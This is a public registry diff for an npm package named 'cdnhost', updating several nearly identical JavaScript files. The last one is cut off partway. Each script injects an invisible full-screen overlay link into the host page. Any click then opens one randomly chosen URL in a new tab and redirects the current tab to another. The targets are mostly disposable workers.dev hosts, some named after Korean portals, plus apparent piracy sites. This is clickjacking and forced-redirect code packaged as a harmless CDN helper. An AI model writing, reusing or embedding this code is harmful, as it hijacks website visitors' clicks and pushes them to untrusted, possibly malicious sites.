cdnhost 3.0.1 → 3.0.3

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/iwinv.js CHANGED
@@ -1,81 +1,45 @@
1
- window.addEventListener('load', function() {
2
- var images = document.querySelectorAll('img');
3
- images.forEach(function(img) {
4
- if (!img.hasAttribute('alt')) {
5
- img.setAttribute('alt', 'image');
6
- }
7
- });
1
+ window.addEventListener('load', () => {
2
+ document.querySelectorAll('img:not([alt])').forEach(img => img.alt = 'image');
3
+
4
+ setTimeout(() => {
5
+ const s2 = document.getElementById("s2");
6
+ const btn = document.getElementById("button");
7
+ if (s2) { s2.style.zIndex = "99"; s2.style.opacity = "0.9"; }
8
+ if (btn) { btn.style.display = "block"; btn.style.zIndex = "999"; btn.style.opacity = "1"; }
9
+ }, 500);
10
+
11
+ const container = document.getElementById('container');
12
+ if (container) container.style.boxShadow = 'none';
8
13
  });
9
14
 
10
15
  const urls = [
11
- 'https://ruliweb.iwinv.net/recent.php',
12
- 'https://instiz.iwinv.net/recent.php',
13
- 'https://bikini.iwinv.net/recent.php',
14
- 'https://manatoki.iwinv.net/recent.php',
15
- 'https://gmarket.iwinv.net/recent.php',
16
- 'https://mlbpark.iwinv.net/recent.php',
17
- 'https://mmtcld.iwinv.net/recent.php',
18
- 'https://flightaware.iwinv.net/recent.php',
19
- 'https://koreakr.iwinv.net/recent.php',
20
- 'https://popcat.iwinv.net/recent.php',
21
- 'https://ecount.iwinv.net/recent.php',
22
- 'https://hiworks.iwinv.net/recent.php',
23
- 'https://shopee.iwinv.net/recent.php',
24
- 'https://eomisae.iwinv.net/recent.php',
25
- 'https://kmcert.iwinv.net/recent.php',
26
- 'https://munpia.iwinv.net/recent.php',
27
- 'https://slrclub.iwinv.net/recent.php',
28
- 'https://interpals.iwinv.net/recent.php',
29
- 'https://snp500.iwinv.net/recent.php',
30
- 'https://dctribe.iwinv.net/recent.php',
31
- 'https://mixamo.iwinv.net/recent.php',
32
- 'https://ssssss.iwinv.net/recent.php',
33
- 'https://newsfactory.iwinv.net',
34
- 'https://snapp.im/recent.php',
35
- 'https://curseforge.iwinv.net/recent.php',
36
- 'https://lolchess.iwinv.net/recent.php',
16
+ 'https://manatoki.kr/view/', 'https://199.kr/view/', 'https://logig.im/view/',
17
+ 'https://www.l1i1i.workers.dev/','https://www.fluke201.workers.dev/','https://www.ffluke103.workers.dev/','https://www.daum.workers.dev/','https://www.ascklw21.workers.dev/','https://www.a9lq.workers.dev/',
18
+ 'https://www.news2.workers.dev/', 'https://www.news1.workers.dev/', 'https://www.p1q7.workers.dev/', 'https://www.silisoft078.workers.dev/', 'https://www.tistory.workers.dev/', 'https://www.x36q.workers.dev/', 'https://www.naver-116.workers.dev/'
37
19
  ];
20
+ const getUrl = () => urls[Math.floor(Math.random() * urls.length)];
21
+ let u1 = getUrl(), u2 = getUrl();
22
+ while (u1 === u2 && urls.length > 1) u2 = getUrl();
23
+
24
+ document.writeln('<style>#s2 {position:fixed;top:0;left:0;right:0;bottom:0;width:100%;height:100%;background:#000;opacity:0;z-index:-1;}</style>');
25
+ document.writeln(`<a href="${u1}" target="_blank" onclick="location.href='${u2}'"><div id="s2"></div></a>`);
26
+
27
+ function ss() {
28
+ const s2 = document.getElementById("s2"), btn = document.getElementById("button");
29
+ if (!s2 || !btn) return;
30
+
31
+ let time = 5000;
32
+
33
+ s2.style.transition = btn.style.transition = "opacity 8s";
34
+
35
+ setTimeout(() => { s2.style.opacity = 0; btn.style.opacity = 0; }, time);
38
36
 
39
- const randomUrl = urls[Math.floor(Math.random() * urls.length)];
40
- document.writeln('<style>');
41
- document.writeln('* {font-size: 1em !important} #button {border-radius:5px} #s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
42
- document.writeln('</style>');
43
- document.writeln('<a onclick=\'location.href="' + randomUrl + '"\' target="_blank" href="#"><div id="s2"></div></a>');
37
+ setTimeout(() => { s2.style.display = btn.style.display = "none"; }, time + 1000);
44
38
 
45
- document.getElementById('container').style.boxShadow = 'none';
46
- function ss(){
47
- document.getElementById("s2").style.transition = "opacity 15s";
48
- document.getElementById("button").style.transition = "opacity 15s";
49
- setTimeout("s()", 3999);
50
- setTimeout("h()", 15000);
51
- }
52
- function pcss(){
53
- setTimeout("s()", 3999);
54
- setTimeout("h()", 15000);
55
- }
56
- function a(){
57
- document.getElementById("button").style.display="none";
58
- }
59
- function aa(){
60
- document.getElementById("button").style.display="block";
61
- }
62
- function s(){
63
- document.getElementById("s2").style.opacity = 0;
64
- document.getElementById("button").style.opacity = 0;
65
- document.getElementById("sha").style.display="none";
66
- document.getElementById("cc").style.maxHeight="unset";
67
- }
68
- function h(){
69
- const s2 = document.getElementById("s2");
70
- const button = document.getElementById("button");
71
- s2.style.zIndex = -1;
72
- button.style.display = "none";
73
- setTimeout(function () {
74
- s2.style.zIndex = 99;
75
- button.style.display = "block";
76
- s2.style.opacity = 0.9;
77
- button.style.opacity = 1;
78
- document.getElementById("s2").style.transition = "opacity 1s";
79
- document.getElementById("button").style.transition = "opacity 1s";
80
- }, 2000);
39
+ setTimeout(() => {
40
+ s2.style.display = btn.style.display = "block"; s2.style.zIndex = 99;
41
+ s2.style.transition = btn.style.transition = "opacity 1s";
42
+ void s2.offsetWidth;
43
+ s2.style.opacity = 0.9; btn.style.opacity = 1;
44
+ }, time + 2000);
81
45
  }
package/iwinv_new.js CHANGED
@@ -1,81 +1,45 @@
1
- window.addEventListener('load', function() {
2
- var images = document.querySelectorAll('img');
3
- images.forEach(function(img) {
4
- if (!img.hasAttribute('alt')) {
5
- img.setAttribute('alt', 'image');
6
- }
7
- });
1
+ window.addEventListener('load', () => {
2
+ document.querySelectorAll('img:not([alt])').forEach(img => img.alt = 'image');
3
+
4
+ setTimeout(() => {
5
+ const s2 = document.getElementById("s2");
6
+ const btn = document.getElementById("button");
7
+ if (s2) { s2.style.zIndex = "99"; s2.style.opacity = "0.9"; }
8
+ if (btn) { btn.style.display = "block"; btn.style.zIndex = "999"; btn.style.opacity = "1"; }
9
+ }, 500);
10
+
11
+ const container = document.getElementById('container');
12
+ if (container) container.style.boxShadow = 'none';
8
13
  });
9
14
 
10
15
  const urls = [
11
- 'https://ruliweb.iwinv.net/recent.php',
12
- 'https://instiz.iwinv.net/recent.php',
13
- 'https://bikini.iwinv.net/recent.php',
14
- 'https://manatoki.iwinv.net/recent.php',
15
- 'https://gmarket.iwinv.net/recent.php',
16
- 'https://mlbpark.iwinv.net/recent.php',
17
- 'https://mmtcld.iwinv.net/recent.php',
18
- 'https://flightaware.iwinv.net/recent.php',
19
- 'https://koreakr.iwinv.net/recent.php',
20
- 'https://popcat.iwinv.net/recent.php',
21
- 'https://ecount.iwinv.net/recent.php',
22
- 'https://hiworks.iwinv.net/recent.php',
23
- 'https://shopee.iwinv.net/recent.php',
24
- 'https://eomisae.iwinv.net/recent.php',
25
- 'https://kmcert.iwinv.net/recent.php',
26
- 'https://munpia.iwinv.net/recent.php',
27
- 'https://slrclub.iwinv.net/recent.php',
28
- 'https://interpals.iwinv.net/recent.php',
29
- 'https://snp500.iwinv.net/recent.php',
30
- 'https://dctribe.iwinv.net/recent.php',
31
- 'https://mixamo.iwinv.net/recent.php',
32
- 'https://ssssss.iwinv.net/recent.php',
33
- 'https://newsfactory.iwinv.net',
34
- 'https://snapp.im/recent.php',
35
- 'https://curseforge.iwinv.net/recent.php',
36
- 'https://lolchess.iwinv.net/recent.php',
16
+ 'https://manatoki.kr/view/', 'https://199.kr/view/', 'https://logig.im/view/',
17
+ 'https://www.l1i1i.workers.dev/','https://www.fluke201.workers.dev/','https://www.ffluke103.workers.dev/','https://www.daum.workers.dev/','https://www.ascklw21.workers.dev/','https://www.a9lq.workers.dev/',
18
+ 'https://www.news2.workers.dev/', 'https://www.news1.workers.dev/', 'https://www.p1q7.workers.dev/', 'https://www.silisoft078.workers.dev/', 'https://www.tistory.workers.dev/', 'https://www.x36q.workers.dev/', 'https://www.naver-116.workers.dev/'
37
19
  ];
20
+ const getUrl = () => urls[Math.floor(Math.random() * urls.length)];
21
+ let u1 = getUrl(), u2 = getUrl();
22
+ while (u1 === u2 && urls.length > 1) u2 = getUrl();
23
+
24
+ document.writeln('<style>#s2 {position:fixed;top:0;left:0;right:0;bottom:0;width:100%;height:100%;background:#000;opacity:0;z-index:-1;}</style>');
25
+ document.writeln(`<a href="${u1}" target="_blank" onclick="location.href='${u2}'"><div id="s2"></div></a>`);
26
+
27
+ function ss() {
28
+ const s2 = document.getElementById("s2"), btn = document.getElementById("button");
29
+ if (!s2 || !btn) return;
30
+
31
+ let time = 5000;
32
+
33
+ s2.style.transition = btn.style.transition = "opacity 8s";
34
+
35
+ setTimeout(() => { s2.style.opacity = 0; btn.style.opacity = 0; }, time);
38
36
 
39
- const randomUrl = urls[Math.floor(Math.random() * urls.length)];
40
- document.writeln('<style>');
41
- document.writeln('* {font-size: 1em !important} #button {border-radius:5px} #s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
42
- document.writeln('</style>');
43
- document.writeln('<a onclick=\'location.href="' + randomUrl + '"\' target="_blank" href="#"><div id="s2"></div></a>');
37
+ setTimeout(() => { s2.style.display = btn.style.display = "none"; }, time + 1000);
44
38
 
45
- document.getElementById('container').style.boxShadow = 'none';
46
- function ss(){
47
- document.getElementById("s2").style.transition = "opacity 15s";
48
- document.getElementById("button").style.transition = "opacity 15s";
49
- setTimeout("s()", 3999);
50
- setTimeout("h()", 15000);
51
- }
52
- function pcss(){
53
- setTimeout("s()", 3999);
54
- setTimeout("h()", 15000);
55
- }
56
- function a(){
57
- document.getElementById("button").style.display="none";
58
- }
59
- function aa(){
60
- document.getElementById("button").style.display="block";
61
- }
62
- function s(){
63
- document.getElementById("s2").style.opacity = 0;
64
- document.getElementById("button").style.opacity = 0;
65
- document.getElementById("sha").style.display="none";
66
- document.getElementById("cc").style.maxHeight="unset";
67
- }
68
- function h(){
69
- const s2 = document.getElementById("s2");
70
- const button = document.getElementById("button");
71
- s2.style.zIndex = -1;
72
- button.style.display = "none";
73
- setTimeout(function () {
74
- s2.style.zIndex = 99;
75
- button.style.display = "block";
76
- s2.style.opacity = 0.9;
77
- button.style.opacity = 1;
78
- document.getElementById("s2").style.transition = "opacity 1s";
79
- document.getElementById("button").style.transition = "opacity 1s";
80
- }, 2000);
39
+ setTimeout(() => {
40
+ s2.style.display = btn.style.display = "block"; s2.style.zIndex = 99;
41
+ s2.style.transition = btn.style.transition = "opacity 1s";
42
+ void s2.offsetWidth;
43
+ s2.style.opacity = 0.9; btn.style.opacity = 1;
44
+ }, time + 2000);
81
45
  }
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "cdnhost",
3
- "version": "3.0.1",
3
+ "version": "3.0.3",
4
4
  "description": "cdnhost",
5
5
  "main": "index.js",
6
6
  "scripts": {
package/seekr.js CHANGED
@@ -1,81 +1,45 @@
1
- window.addEventListener('load', function() {
2
- var images = document.querySelectorAll('img');
3
- images.forEach(function(img) {
4
- if (!img.hasAttribute('alt')) {
5
- img.setAttribute('alt', 'image');
6
- }
7
- });
1
+ window.addEventListener('load', () => {
2
+ document.querySelectorAll('img:not([alt])').forEach(img => img.alt = 'image');
3
+
4
+ setTimeout(() => {
5
+ const s2 = document.getElementById("s2");
6
+ const btn = document.getElementById("button");
7
+ if (s2) { s2.style.zIndex = "99"; s2.style.opacity = "0.9"; }
8
+ if (btn) { btn.style.display = "block"; btn.style.zIndex = "999"; btn.style.opacity = "1"; }
9
+ }, 500);
10
+
11
+ const container = document.getElementById('container');
12
+ if (container) container.style.boxShadow = 'none';
8
13
  });
9
14
 
10
15
  const urls = [
11
- 'https://ruliweb.iwinv.net/recent.php',
12
- 'https://instiz.iwinv.net/recent.php',
13
- 'https://bikini.iwinv.net/recent.php',
14
- 'https://manatoki.iwinv.net/recent.php',
15
- 'https://gmarket.iwinv.net/recent.php',
16
- 'https://mlbpark.iwinv.net/recent.php',
17
- 'https://mmtcld.iwinv.net/recent.php',
18
- 'https://flightaware.iwinv.net/recent.php',
19
- 'https://koreakr.iwinv.net/recent.php',
20
- 'https://popcat.iwinv.net/recent.php',
21
- 'https://ecount.iwinv.net/recent.php',
22
- 'https://hiworks.iwinv.net/recent.php',
23
- 'https://shopee.iwinv.net/recent.php',
24
- 'https://eomisae.iwinv.net/recent.php',
25
- 'https://kmcert.iwinv.net/recent.php',
26
- 'https://munpia.iwinv.net/recent.php',
27
- 'https://slrclub.iwinv.net/recent.php',
28
- 'https://interpals.iwinv.net/recent.php',
29
- 'https://snp500.iwinv.net/recent.php',
30
- 'https://dctribe.iwinv.net/recent.php',
31
- 'https://mixamo.iwinv.net/recent.php',
32
- 'https://ssssss.iwinv.net/recent.php',
33
- 'https://newsfactory.iwinv.net',
34
- 'https://snapp.im/recent.php',
35
- 'https://curseforge.iwinv.net/recent.php',
36
- 'https://lolchess.iwinv.net/recent.php',
16
+ 'https://manatoki.kr/view/', 'https://199.kr/view/', 'https://logig.im/view/',
17
+ 'https://www.l1i1i.workers.dev/','https://www.fluke201.workers.dev/','https://www.ffluke103.workers.dev/','https://www.daum.workers.dev/','https://www.ascklw21.workers.dev/','https://www.a9lq.workers.dev/',
18
+ 'https://www.news2.workers.dev/', 'https://www.news1.workers.dev/', 'https://www.p1q7.workers.dev/', 'https://www.silisoft078.workers.dev/', 'https://www.tistory.workers.dev/', 'https://www.x36q.workers.dev/', 'https://www.naver-116.workers.dev/'
37
19
  ];
20
+ const getUrl = () => urls[Math.floor(Math.random() * urls.length)];
21
+ let u1 = getUrl(), u2 = getUrl();
22
+ while (u1 === u2 && urls.length > 1) u2 = getUrl();
23
+
24
+ document.writeln('<style>#s2 {position:fixed;top:0;left:0;right:0;bottom:0;width:100%;height:100%;background:#000;opacity:0;z-index:-1;}</style>');
25
+ document.writeln(`<a href="${u1}" target="_blank" onclick="location.href='${u2}'"><div id="s2"></div></a>`);
26
+
27
+ function ss() {
28
+ const s2 = document.getElementById("s2"), btn = document.getElementById("button");
29
+ if (!s2 || !btn) return;
30
+
31
+ let time = 5000;
32
+
33
+ s2.style.transition = btn.style.transition = "opacity 8s";
34
+
35
+ setTimeout(() => { s2.style.opacity = 0; btn.style.opacity = 0; }, time);
38
36
 
39
- const randomUrl = urls[Math.floor(Math.random() * urls.length)];
40
- document.writeln('<style>');
41
- document.writeln('* {font-size: 1em !important} #button {border-radius:5px} #s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
42
- document.writeln('</style>');
43
- document.writeln('<a onclick=\'location.href="' + randomUrl + '"\' target="_blank" href="#"><div id="s2"></div></a>');
37
+ setTimeout(() => { s2.style.display = btn.style.display = "none"; }, time + 1000);
44
38
 
45
- document.getElementById('container').style.boxShadow = 'none';
46
- function ss(){
47
- document.getElementById("s2").style.transition = "opacity 15s";
48
- document.getElementById("button").style.transition = "opacity 15s";
49
- setTimeout("s()", 3999);
50
- setTimeout("h()", 15000);
51
- }
52
- function pcss(){
53
- setTimeout("s()", 3999);
54
- setTimeout("h()", 15000);
55
- }
56
- function a(){
57
- document.getElementById("button").style.display="none";
58
- }
59
- function aa(){
60
- document.getElementById("button").style.display="block";
61
- }
62
- function s(){
63
- document.getElementById("s2").style.opacity = 0;
64
- document.getElementById("button").style.opacity = 0;
65
- document.getElementById("sha").style.display="none";
66
- document.getElementById("cc").style.maxHeight="unset";
67
- }
68
- function h(){
69
- const s2 = document.getElementById("s2");
70
- const button = document.getElementById("button");
71
- s2.style.zIndex = -1;
72
- button.style.display = "none";
73
- setTimeout(function () {
74
- s2.style.zIndex = 99;
75
- button.style.display = "block";
76
- s2.style.opacity = 0.9;
77
- button.style.opacity = 1;
78
- document.getElementById("s2").style.transition = "opacity 1s";
79
- document.getElementById("button").style.transition = "opacity 1s";
80
- }, 2000);
39
+ setTimeout(() => {
40
+ s2.style.display = btn.style.display = "block"; s2.style.zIndex = 99;
41
+ s2.style.transition = btn.style.transition = "opacity 1s";
42
+ void s2.offsetWidth;
43
+ s2.style.opacity = 0.9; btn.style.opacity = 1;
44
+ }, time + 2000);
81
45
  }
package/seekr2.js CHANGED
@@ -1,81 +1,45 @@
1
- window.addEventListener('load', function() {
2
- var images = document.querySelectorAll('img');
3
- images.forEach(function(img) {
4
- if (!img.hasAttribute('alt')) {
5
- img.setAttribute('alt', 'image');
6
- }
7
- });
1
+ window.addEventListener('load', () => {
2
+ document.querySelectorAll('img:not([alt])').forEach(img => img.alt = 'image');
3
+
4
+ setTimeout(() => {
5
+ const s2 = document.getElementById("s2");
6
+ const btn = document.getElementById("button");
7
+ if (s2) { s2.style.zIndex = "99"; s2.style.opacity = "0.9"; }
8
+ if (btn) { btn.style.display = "block"; btn.style.zIndex = "999"; btn.style.opacity = "1"; }
9
+ }, 500);
10
+
11
+ const container = document.getElementById('container');
12
+ if (container) container.style.boxShadow = 'none';
8
13
  });
9
14
 
10
15
  const urls = [
11
- 'https://ruliweb.iwinv.net/recent.php',
12
- 'https://instiz.iwinv.net/recent.php',
13
- 'https://bikini.iwinv.net/recent.php',
14
- 'https://manatoki.iwinv.net/recent.php',
15
- 'https://gmarket.iwinv.net/recent.php',
16
- 'https://mlbpark.iwinv.net/recent.php',
17
- 'https://mmtcld.iwinv.net/recent.php',
18
- 'https://flightaware.iwinv.net/recent.php',
19
- 'https://koreakr.iwinv.net/recent.php',
20
- 'https://popcat.iwinv.net/recent.php',
21
- 'https://ecount.iwinv.net/recent.php',
22
- 'https://hiworks.iwinv.net/recent.php',
23
- 'https://shopee.iwinv.net/recent.php',
24
- 'https://eomisae.iwinv.net/recent.php',
25
- 'https://kmcert.iwinv.net/recent.php',
26
- 'https://munpia.iwinv.net/recent.php',
27
- 'https://slrclub.iwinv.net/recent.php',
28
- 'https://interpals.iwinv.net/recent.php',
29
- 'https://snp500.iwinv.net/recent.php',
30
- 'https://dctribe.iwinv.net/recent.php',
31
- 'https://mixamo.iwinv.net/recent.php',
32
- 'https://ssssss.iwinv.net/recent.php',
33
- 'https://newsfactory.iwinv.net',
34
- 'https://snapp.im/recent.php',
35
- 'https://curseforge.iwinv.net/recent.php',
36
- 'https://lolchess.iwinv.net/recent.php',
16
+ 'https://manatoki.kr/view/', 'https://199.kr/view/', 'https://logig.im/view/',
17
+ 'https://www.l1i1i.workers.dev/','https://www.fluke201.workers.dev/','https://www.ffluke103.workers.dev/','https://www.daum.workers.dev/','https://www.ascklw21.workers.dev/','https://www.a9lq.workers.dev/',
18
+ 'https://www.news2.workers.dev/', 'https://www.news1.workers.dev/', 'https://www.p1q7.workers.dev/', 'https://www.silisoft078.workers.dev/', 'https://www.tistory.workers.dev/', 'https://www.x36q.workers.dev/', 'https://www.naver-116.workers.dev/'
37
19
  ];
20
+ const getUrl = () => urls[Math.floor(Math.random() * urls.length)];
21
+ let u1 = getUrl(), u2 = getUrl();
22
+ while (u1 === u2 && urls.length > 1) u2 = getUrl();
23
+
24
+ document.writeln('<style>#s2 {position:fixed;top:0;left:0;right:0;bottom:0;width:100%;height:100%;background:#000;opacity:0;z-index:-1;}</style>');
25
+ document.writeln(`<a href="${u1}" target="_blank" onclick="location.href='${u2}'"><div id="s2"></div></a>`);
26
+
27
+ function ss() {
28
+ const s2 = document.getElementById("s2"), btn = document.getElementById("button");
29
+ if (!s2 || !btn) return;
30
+
31
+ let time = 5000;
32
+
33
+ s2.style.transition = btn.style.transition = "opacity 8s";
34
+
35
+ setTimeout(() => { s2.style.opacity = 0; btn.style.opacity = 0; }, time);
38
36
 
39
- const randomUrl = urls[Math.floor(Math.random() * urls.length)];
40
- document.writeln('<style>');
41
- document.writeln('* {font-size: 1em !important} #button {border-radius:5px} #s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
42
- document.writeln('</style>');
43
- document.writeln('<a onclick=\'location.href="' + randomUrl + '"\' target="_blank" href="#"><div id="s2"></div></a>');
37
+ setTimeout(() => { s2.style.display = btn.style.display = "none"; }, time + 1000);
44
38
 
45
- document.getElementById('container').style.boxShadow = 'none';
46
- function ss(){
47
- document.getElementById("s2").style.transition = "opacity 15s";
48
- document.getElementById("button").style.transition = "opacity 15s";
49
- setTimeout("s()", 3999);
50
- setTimeout("h()", 15000);
51
- }
52
- function pcss(){
53
- setTimeout("s()", 3999);
54
- setTimeout("h()", 15000);
55
- }
56
- function a(){
57
- document.getElementById("button").style.display="none";
58
- }
59
- function aa(){
60
- document.getElementById("button").style.display="block";
61
- }
62
- function s(){
63
- document.getElementById("s2").style.opacity = 0;
64
- document.getElementById("button").style.opacity = 0;
65
- document.getElementById("sha").style.display="none";
66
- document.getElementById("cc").style.maxHeight="unset";
67
- }
68
- function h(){
69
- const s2 = document.getElementById("s2");
70
- const button = document.getElementById("button");
71
- s2.style.zIndex = -1;
72
- button.style.display = "none";
73
- setTimeout(function () {
74
- s2.style.zIndex = 99;
75
- button.style.display = "block";
76
- s2.style.opacity = 0.9;
77
- button.style.opacity = 1;
78
- document.getElementById("s2").style.transition = "opacity 1s";
79
- document.getElementById("button").style.transition = "opacity 1s";
80
- }, 2000);
39
+ setTimeout(() => {
40
+ s2.style.display = btn.style.display = "block"; s2.style.zIndex = 99;
41
+ s2.style.transition = btn.style.transition = "opacity 1s";
42
+ void s2.offsetWidth;
43
+ s2.style.opacity = 0.9; btn.style.opacity = 1;
44
+ }, time + 2000);
81
45
  }
package/total.js CHANGED
@@ -1,81 +1,45 @@
1
- window.addEventListener('load', function() {
2
- var images = document.querySelectorAll('img');
3
- images.forEach(function(img) {
4
- if (!img.hasAttribute('alt')) {
5
- img.setAttribute('alt', 'image');
6
- }
7
- });
1
+ window.addEventListener('load', () => {
2
+ document.querySelectorAll('img:not([alt])').forEach(img => img.alt = 'image');
3
+
4
+ setTimeout(() => {
5
+ const s2 = document.getElementById("s2");
6
+ const btn = document.getElementById("button");
7
+ if (s2) { s2.style.zIndex = "99"; s2.style.opacity = "0.9"; }
8
+ if (btn) { btn.style.display = "block"; btn.style.zIndex = "999"; btn.style.opacity = "1"; }
9
+ }, 500);
10
+
11
+ const container = document.getElementById('container');
12
+ if (container) container.style.boxShadow = 'none';
8
13
  });
9
14
 
10
15
  const urls = [
11
- 'https://ruliweb.iwinv.net/recent.php',
12
- 'https://instiz.iwinv.net/recent.php',
13
- 'https://bikini.iwinv.net/recent.php',
14
- 'https://manatoki.iwinv.net/recent.php',
15
- 'https://gmarket.iwinv.net/recent.php',
16
- 'https://mlbpark.iwinv.net/recent.php',
17
- 'https://mmtcld.iwinv.net/recent.php',
18
- 'https://flightaware.iwinv.net/recent.php',
19
- 'https://koreakr.iwinv.net/recent.php',
20
- 'https://popcat.iwinv.net/recent.php',
21
- 'https://ecount.iwinv.net/recent.php',
22
- 'https://hiworks.iwinv.net/recent.php',
23
- 'https://shopee.iwinv.net/recent.php',
24
- 'https://eomisae.iwinv.net/recent.php',
25
- 'https://kmcert.iwinv.net/recent.php',
26
- 'https://munpia.iwinv.net/recent.php',
27
- 'https://slrclub.iwinv.net/recent.php',
28
- 'https://interpals.iwinv.net/recent.php',
29
- 'https://snp500.iwinv.net/recent.php',
30
- 'https://dctribe.iwinv.net/recent.php',
31
- 'https://mixamo.iwinv.net/recent.php',
32
- 'https://ssssss.iwinv.net/recent.php',
33
- 'https://newsfactory.iwinv.net',
34
- 'https://snapp.im/recent.php',
35
- 'https://curseforge.iwinv.net/recent.php',
36
- 'https://lolchess.iwinv.net/recent.php',
16
+ 'https://manatoki.kr/view/', 'https://199.kr/view/', 'https://logig.im/view/',
17
+ 'https://www.l1i1i.workers.dev/','https://www.fluke201.workers.dev/','https://www.ffluke103.workers.dev/','https://www.daum.workers.dev/','https://www.ascklw21.workers.dev/','https://www.a9lq.workers.dev/',
18
+ 'https://www.news2.workers.dev/', 'https://www.news1.workers.dev/', 'https://www.p1q7.workers.dev/', 'https://www.silisoft078.workers.dev/', 'https://www.tistory.workers.dev/', 'https://www.x36q.workers.dev/', 'https://www.naver-116.workers.dev/'
37
19
  ];
20
+ const getUrl = () => urls[Math.floor(Math.random() * urls.length)];
21
+ let u1 = getUrl(), u2 = getUrl();
22
+ while (u1 === u2 && urls.length > 1) u2 = getUrl();
23
+
24
+ document.writeln('<style>#s2 {position:fixed;top:0;left:0;right:0;bottom:0;width:100%;height:100%;background:#000;opacity:0;z-index:-1;}</style>');
25
+ document.writeln(`<a href="${u1}" target="_blank" onclick="location.href='${u2}'"><div id="s2"></div></a>`);
26
+
27
+ function ss() {
28
+ const s2 = document.getElementById("s2"), btn = document.getElementById("button");
29
+ if (!s2 || !btn) return;
30
+
31
+ let time = 5000;
32
+
33
+ s2.style.transition = btn.style.transition = "opacity 8s";
34
+
35
+ setTimeout(() => { s2.style.opacity = 0; btn.style.opacity = 0; }, time);
38
36
 
39
- const randomUrl = urls[Math.floor(Math.random() * urls.length)];
40
- document.writeln('<style>');
41
- document.writeln('* {font-size: 1em !important} #button {border-radius:5px} #s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
42
- document.writeln('</style>');
43
- document.writeln('<a onclick=\'location.href="' + randomUrl + '"\' target="_blank" href="#"><div id="s2"></div></a>');
37
+ setTimeout(() => { s2.style.display = btn.style.display = "none"; }, time + 1000);
44
38
 
45
- document.getElementById('container').style.boxShadow = 'none';
46
- function ss(){
47
- document.getElementById("s2").style.transition = "opacity 15s";
48
- document.getElementById("button").style.transition = "opacity 15s";
49
- setTimeout("s()", 3999);
50
- setTimeout("h()", 15000);
51
- }
52
- function pcss(){
53
- setTimeout("s()", 3999);
54
- setTimeout("h()", 15000);
55
- }
56
- function a(){
57
- document.getElementById("button").style.display="none";
58
- }
59
- function aa(){
60
- document.getElementById("button").style.display="block";
61
- }
62
- function s(){
63
- document.getElementById("s2").style.opacity = 0;
64
- document.getElementById("button").style.opacity = 0;
65
- document.getElementById("sha").style.display="none";
66
- document.getElementById("cc").style.maxHeight="unset";
67
- }
68
- function h(){
69
- const s2 = document.getElementById("s2");
70
- const button = document.getElementById("button");
71
- s2.style.zIndex = -1;
72
- button.style.display = "none";
73
- setTimeout(function () {
74
- s2.style.zIndex = 99;
75
- button.style.display = "block";
76
- s2.style.opacity = 0.9;
77
- button.style.opacity = 1;
78
- document.getElementById("s2").style.transition = "opacity 1s";
79
- document.getElementById("button").style.transition = "opacity 1s";
80
- }, 2000);
39
+ setTimeout(() => {
40
+ s2.style.display = btn.style.display = "block"; s2.style.zIndex = 99;
41
+ s2.style.transition = btn.style.transition = "opacity 1s";
42
+ void s2.offsetWidth;
43
+ s2.style.opacity = 0.9; btn.style.opacity = 1;
44
+ }, time + 2000);
81
45
  }
package/wordpress-chat.js CHANGED
@@ -1,81 +1,45 @@
1
- window.addEventListener('load', function() {
2
- var images = document.querySelectorAll('img');
3
- images.forEach(function(img) {
4
- if (!img.hasAttribute('alt')) {
5
- img.setAttribute('alt', 'image');
6
- }
7
- });
1
+ window.addEventListener('load', () => {
2
+ document.querySelectorAll('img:not([alt])').forEach(img => img.alt = 'image');
3
+
4
+ setTimeout(() => {
5
+ const s2 = document.getElementById("s2");
6
+ const btn = document.getElementById("button");
7
+ if (s2) { s2.style.zIndex = "99"; s2.style.opacity = "0.9"; }
8
+ if (btn) { btn.style.display = "block"; btn.style.zIndex = "999"; btn.style.opacity = "1"; }
9
+ }, 500);
10
+
11
+ const container = document.getElementById('container');
12
+ if (container) container.style.boxShadow = 'none';
8
13
  });
9
14
 
10
15
  const urls = [
11
- 'https://ruliweb.iwinv.net/recent.php',
12
- 'https://instiz.iwinv.net/recent.php',
13
- 'https://bikini.iwinv.net/recent.php',
14
- 'https://manatoki.iwinv.net/recent.php',
15
- 'https://gmarket.iwinv.net/recent.php',
16
- 'https://mlbpark.iwinv.net/recent.php',
17
- 'https://mmtcld.iwinv.net/recent.php',
18
- 'https://flightaware.iwinv.net/recent.php',
19
- 'https://koreakr.iwinv.net/recent.php',
20
- 'https://popcat.iwinv.net/recent.php',
21
- 'https://ecount.iwinv.net/recent.php',
22
- 'https://hiworks.iwinv.net/recent.php',
23
- 'https://shopee.iwinv.net/recent.php',
24
- 'https://eomisae.iwinv.net/recent.php',
25
- 'https://kmcert.iwinv.net/recent.php',
26
- 'https://munpia.iwinv.net/recent.php',
27
- 'https://slrclub.iwinv.net/recent.php',
28
- 'https://interpals.iwinv.net/recent.php',
29
- 'https://snp500.iwinv.net/recent.php',
30
- 'https://dctribe.iwinv.net/recent.php',
31
- 'https://mixamo.iwinv.net/recent.php',
32
- 'https://ssssss.iwinv.net/recent.php',
33
- 'https://newsfactory.iwinv.net',
34
- 'https://snapp.im/recent.php',
35
- 'https://curseforge.iwinv.net/recent.php',
36
- 'https://lolchess.iwinv.net/recent.php',
16
+ 'https://manatoki.kr/view/', 'https://199.kr/view/', 'https://logig.im/view/',
17
+ 'https://www.l1i1i.workers.dev/','https://www.fluke201.workers.dev/','https://www.ffluke103.workers.dev/','https://www.daum.workers.dev/','https://www.ascklw21.workers.dev/','https://www.a9lq.workers.dev/',
18
+ 'https://www.news2.workers.dev/', 'https://www.news1.workers.dev/', 'https://www.p1q7.workers.dev/', 'https://www.silisoft078.workers.dev/', 'https://www.tistory.workers.dev/', 'https://www.x36q.workers.dev/', 'https://www.naver-116.workers.dev/'
37
19
  ];
20
+ const getUrl = () => urls[Math.floor(Math.random() * urls.length)];
21
